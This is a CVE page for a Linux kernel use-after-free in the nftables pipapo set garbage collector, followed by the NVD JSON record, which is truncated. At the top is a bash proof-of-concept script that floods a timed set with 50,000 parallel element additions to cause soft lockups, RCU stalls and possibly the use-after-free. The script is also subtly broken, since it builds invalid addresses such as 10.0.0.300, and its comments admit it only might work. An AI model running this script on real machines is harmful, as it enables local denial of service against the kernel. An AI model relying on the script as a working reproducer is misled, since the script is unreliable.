CVE-2026-23351

#!/bin/bash # PoC for CVE-2026-23351: Trigger GC stress in nft_set_pipapo # This script creates a large number of elements to stress the garbage collector. TABLE="poc_table" SET="poc_set" # Clean up previous attempts nft delete table ip $TABLE 2>/dev/null # Create table and a pipapo set with timeout nft add table ip $TABLE nft add set ip $TABLE $SET { type ipv4_addr \; flags timeout \; } echo "Adding elements to trigger GC pressure..." # Add a large number of elements to induce long GC runtimes for i in $(seq 1 50000); do nft add element ip $TABLE $SET { 10.0.0.$i timeout 1s } & done wait echo "Waiting for elements to expire and GC to run..." sleep 5 # Trigger a commit or operation that interacts with the set # This might trigger the Use-after-free if timing aligns with RCU nft list set ip $TABLE $SET > /dev/null echo "PoC execution finished. Check kernel logs for soft lockups or RCU stalls."

{"cve": {"id": "CVE-2026-23351", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-25T11:16:33.450", "lastModified": "2026-04-24T18:02:24.367", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_set_pipapo: split gc into unlink and reclaim phase\n\nYiming Qian reports Use-after-free in the pipapo set type:\n Under a large number of expired elements, commit-time GC can run for a very\n long time in a non-preemptible context, triggering soft lockup warnings and\n RCU stall reports (local denial of service).\n\nWe must split GC in an unlink and a reclaim phase.\n\nWe cannot queue elements for freeing until pointers have been swapped.\nExpired elements are still exposed to both the packet path and userspace\ndumpers via the live copy of the data structure.\n\ncall_rcu() does not protect us: dump operations or element lookups starting\nafter call_rcu has fired can still observe the free'd element, unless the\ncommit phase has made enough progress to swap the clone and live pointers\nbefore any new reader has picked up the old version.\n\nThis a similar approach as done recently for the rbtree backend in commit\n35f83a75529a (\"netfilter: nft_set_rbtree: don't gc elements on insert\")."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nnetfilter: nft_set_pipapo: dividir la recolección de basura en una fase de desvinculación y una fase de recuperación\n\nYiming Qian informa de un uso después de liberación en el tipo de conjunto pipapo:\nBajo un gran número de elementos caducados, la recolección de basura en tiempo de commit puede ejecutarse durante mucho tiempo en un contexto no preemptivo, lo que desencadena advertencias de soft lockup e informes de bloqueo de RCU (denegación de servicio local).\n\nDebemos dividir la recolección de basura en una fase de desvinculación y una de recuperación.\n\nNo podemos poner en cola elementos para su liberación hasta que los punteros hayan sido intercambiados.\nLos elementos caducados todavía están expuestos tanto a la ruta de paquetes como a los volcadores del espacio de usuario a través de la copia activa de la estructura de datos.\n\ncall_rcu() no nos protege: las operaciones de volcado o las búsquedas de elementos que comienzan después de que call_rcu se haya activado aún pueden observar el elemento liberado, a menos que la fase de commit haya progresado lo suficiente como para intercambiar los punteros de clonación y activos antes de que cualquier nuevo lector haya tomado la versión antigua.\n\nEste es un enfoque similar al realizado recientemente para el backend rbtree en el commit 35f83a75529a ('netfilter: nft_set_rbtree: no recolectar elementos en la inserción')."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.6.1", "versionEndExcluding": "5.10.253", "matchCriteriaId": "4F8ED570-37E2-4ED4-AF42-BCE310D198D4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.203", "matchCriteriaId": "20DDB3E9-AABF-4107-ADB0-5362AA067045"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.167", "matchCriteriaId": "2EDC6BAF-B710-4E26-B6AA-D68922EE7B43"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.130", "matchCriteriaId": "C57BB918-DF28-46B3-94F7-144176841267"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.77", "matchCriteriaId": "B3D12E00-E42D-4056-B354-BAD4903C03A5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.17", "matchCriteriaId": "A5E006E4-59C7-43C1-9231-62A72219F2BA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.7", "matchCriteriaId": "69245D10-0B71-485E-80C3- ... (truncated)